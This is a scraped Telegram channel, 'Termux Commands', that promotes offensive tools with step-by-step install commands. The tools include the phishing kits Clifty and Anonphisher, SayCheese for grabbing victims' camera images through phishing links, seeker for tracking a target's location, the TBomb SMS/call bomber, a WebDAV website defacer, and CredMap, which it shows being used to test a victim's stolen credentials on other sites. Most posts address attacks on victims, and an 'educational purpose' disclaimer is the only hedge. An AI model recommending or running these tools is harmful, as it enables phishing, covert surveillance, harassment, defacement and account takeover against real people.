Termux Commands
8.82K subscribers
45 photos
2 videos
5 files
14 links
This Channel DOES NOT Promote or encourage Any illegal activities, all content provided by This Channel is meant for EDUCATIONAL PURPOSE only.
Download Telegram
Termux Commands
ABOUT TOOL: Clifty is the most powerful and compact phishing tool. it has lots of advantages. Give it a try. More Info About Clifty: Clifty Is a fully updated phishing tool that gives you all the features that any phishing tool has in the market. It contains more…
To Install Clifty Type The Following Commands "Each" On Your Terminal:

pkg update && pkg upgrade -y

pkg install cloudflared git -y

git clone https://github.com/Alygnt/Clifty

cd Clifty

All Done, Running Clifty

bash clifty.sh
👍274🎉3🥰1
🤳 SayCheese Termux: Take Webcam Shots From Target With Termux Using
|SayCheese|


SayCheese is an image grabber tool that will allow you to capture images from the victim's phone and save them inside your termux. using this tool you can get anyone's face snap by just sending them a phishing link. The tool can help in situations where you want to know someone's identity.
👍171
Termux Commands
🤳 SayCheese Termux: Take Webcam Shots From Target With Termux Using |SayCheese| SayCheese is an image grabber tool that will allow you to capture images from the victim's phone and save them inside your termux. using this tool you can get anyone's face…
To Install SayCheese Type The Following Commands "Each" On Your Termux Terminal

apt update && apt upgrade -y

apt install php wget git httrack -y

Now You're Done Installing The Dependencies Run The Repo

git clone https://github.com/hangetzzu/saycheese

cd saycheese

chmod +x saycheese.sh
👍73
👍101
🔬seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites.

the cool thing about seeker is that Other tools and services provide IP geolocation, which is NOT accurate at all and only provides an ISP's approximate location rather than the target's location.
👍95
Termux Commands
🔬 • seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites. the cool thing about seeker is that Other tools and services provide IP geolocation,…
To Install (SEEKER) Type The Below Commands On Your Termux Terminal "Each"

pkg update && pkg upgrade -y

pkg install cloudflared git -y

git clone https://github.com/thewhiteh4t/seeker.git

cd seeker

chmod +x install.sh

./install.sh

This Command Below Runs Seeker You Can Use It If You Have Restarted Your Termux APK

python seeker.py
👍22
TBOMB [v2.1b] An open-source SMS/call bomber for Linux And Termux.
👍82
Termux Commands
TBOMB [v2.1b] • An open-source SMS/call bomber for Linux And Termux.
To Install (TBOMB) Type The Below Commands On Your Termux Terminal "Each"

pkg install git -y

pkg install python -y

git clone https://github.com/TheSpeedX/TBomb.git

cd TBomb

./TBomb.sh

⚠️NOTE:
Due to the overuse of script, a bunch of APIs has been taken offline. It is okay if you do not receive all the messages.


‼️ @T3rmux_Hacking_Commands
‼️
@L3arnH4ckiNgC
👍157🔥6🥰2
AnonphisherAutomated phishing tool made by AnonyminHack5 to phish various sites with 51+ templates and also has an inbuilt reverse proxy already to easily help you generate your link and send it to your victim. Anonphisher tool is made with pure bash script and needs required packages for it to work.

🔔Features :- Instagram, Facebook, Airbnb, Twitter, Snapchat, Github, Yahoo, Protonmail, Google, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, fortnite, cod...+33
👍255
Termux Commands
Anonphisher • Automated phishing tool made by AnonyminHack5 to phish various sites with 51+ templates and also has an inbuilt reverse proxy already to easily help you generate your link and send it to your victim. Anonphisher tool is made with pure bash script…
To Install (Anonphisher) Type The Below Commands On Your Termux Terminal "Each"

$ git clone https://github.com/TermuxHackz/anonphisher

$ cd anonphisher

$ bash anonphisher.sh
👍1510
! myTermux : Make Your Termux Look Better

🍦myTermux is a custom configuration of termux application with different themes and colourful prompts.

Almost everything about this configuration is unique, and the tool is really fun to interact with. myTermux have a lot of features like command Validation where if you type a right command it will be shown in green colour and if it's wrong the command will be red. It will also auto suggested you the files and paths based on your previous use.
👍101
Termux Commands
! myTermux : Make Your Termux Look Better 🍦 • myTermux is a custom configuration of termux application with different themes and colourful prompts. Almost everything about this configuration is unique, and the tool is really fun to interact with. myTermux…
Installation Firstly You Have To Install The Requirements Copy & Paste The Commands Below "Each" On Your Termux Terminal

Updating The Repository & Upgrade Package

pkg update -y

pkg update && pkg upgrade

pkg i -y git bc

git clone --depth=1 https://github.com/mayTermux/myTermux.git

cd myTermux

export COLUMNS LINES

./install.sh

If you see a table of contents the script will ask for Y/n Just press Enter

Now when you will see this screen you have to exit from nvim, to do that you have to press ENTER then q and then type :q and press Enter. if you will do everything properly, you will exit out from the installation screen and see that "installation is finish". Now exit from termux from notification bar or any way you want, after you will relaunch you will see the myTermux Theme.
👍206🔥3
com.termux_118.apk
97 MB
The Termux application on the Google Play Store does not receive updates and is outdated for more than one year.

Introducing Termux From F-Droid, as an open-source catalog, puts security and privacy at the center of its offer. Which makes it safe to install, enjoy
25👍20
🐍WhiteDeface : A Simple Python Tool That Can Automatically Disable "WEBDAV" Vulnerable Websites

A Simple Tool That Can Automatically Deface Vulnerable Websites It Uses "WEBDAV" Vulnerability To Exploit.

🗒️ More INFO...

This Script Sends A PUT Requests To The Websites Given In the Target's/Targets TXT File. Unauthenticated Requests Will Be Accepted And Your HTML Script Will Be Uploaded In The Website.
👍142🔥1
Termux Commands
🐍 • WhiteDeface : A Simple Python Tool That Can Automatically Disable "WEBDAV" Vulnerable Websites A Simple Tool That Can Automatically Deface Vulnerable Websites It Uses "WEBDAV" Vulnerability To Exploit. 🗒️ More INFO... This Script Sends A PUT Requests…
Installation To Use "WhiteDeface" Type The Following Commands Each On Your (Termux!) Terminal

apt update -y && apt upgrade -y

pkg install git -y

pkg install python -y

pip2 install requests

git clone https://github.com/WH1T3-E4GL3/white-deface.git

cd white-deface

pip install -r requirements.txt

git pull

python white-deface.py

SINGLE Command.

apt update -y && apt upgrade -y && pkg install git -y && pkg install python -y && pip2 install requests && git clone https://github.com/WH1T3-E4GL3/white-deface.git && cd white-deface && pip install -r requirements.txt && git pull && python white-deface.py
👍161
🗺️CredMap : Credential mapper that allows you to login in on multiple websites using specified credentials.

CredMap* is a Credential mapper that allows you to login in on multiple websites using specified credentials

🧠 | Let's say you have login credentials of victims Gmail account and you want to find out, is it possible to log in on other social media accounts using the same credentials. Then Credmap will be the best tool for this job.
👍205🔥2
Termux Commands
🗺️ • CredMap : Credential mapper that allows you to login in on multiple websites using specified credentials. CredMap* is a Credential mapper that allows you to login in on multiple websites using specified credentials 🧠 | Let's say you have login credentials…
Installation: To Install (CredMap) Type The Below Commands *Each On Your Termux Terminal

apt update && apt upgrade

pkg install git python python2

• git clone https://github.com/lightos/credmap.git

cd credmap

chmod +x *
👍113🎉1
Termux Commands
Installation: To Install (CredMap) Type The Below Commands *Each On Your Termux Terminal • apt update && apt upgrade • pkg install git python python2 • git clone https://github.com/lightos/credmap.git • cd credmap • chmod +x *
💡 To Run The *CredMap you can use the below command , please make sure to change the username and password with the victim's credentials in command the command below.


 python2 credmap.py --email MAIL --password PASSWORD

For An Example: python2 credmap.py --email examplemail@gmail.com --password 12345678
👍11
💡 Here's A List Of Termux Basic Commands You Need To Know

Update all the packages and dependencies installed on the system:
• apt update && apt upgrade

Granting storage permission:
• termux-setup-storage

Knowing Which directory you are in:
• pwd

List all the files and directories:
 • ls

List all the files and directories including Hidden Files:
ls -a

List all the files with file size:
ls -lh

Move forward in directories:
• cd storage

Move backward in directories:
• cd ..

Clear Screen:
• clear

Creating a folder or a directory:
mkdir folderName
👍3318
👁️ See-U: A Camera Hacking Tool Which Is Used To Hack Selfie/Front Camera

Understanding Of Camera Hacking, Firstly What Is Camera Hacking

Hacking cameras is the act of gaining unauthorized access to someone else's security camera system to view live or recorded video footage.

📨... This can be done through exploiting vulnerabilities in the camera's software or hacking into the network that the cameras are connected to.
Hacking cameras can be used for malicious purposes such as spying, theft, or blackmail.
👍116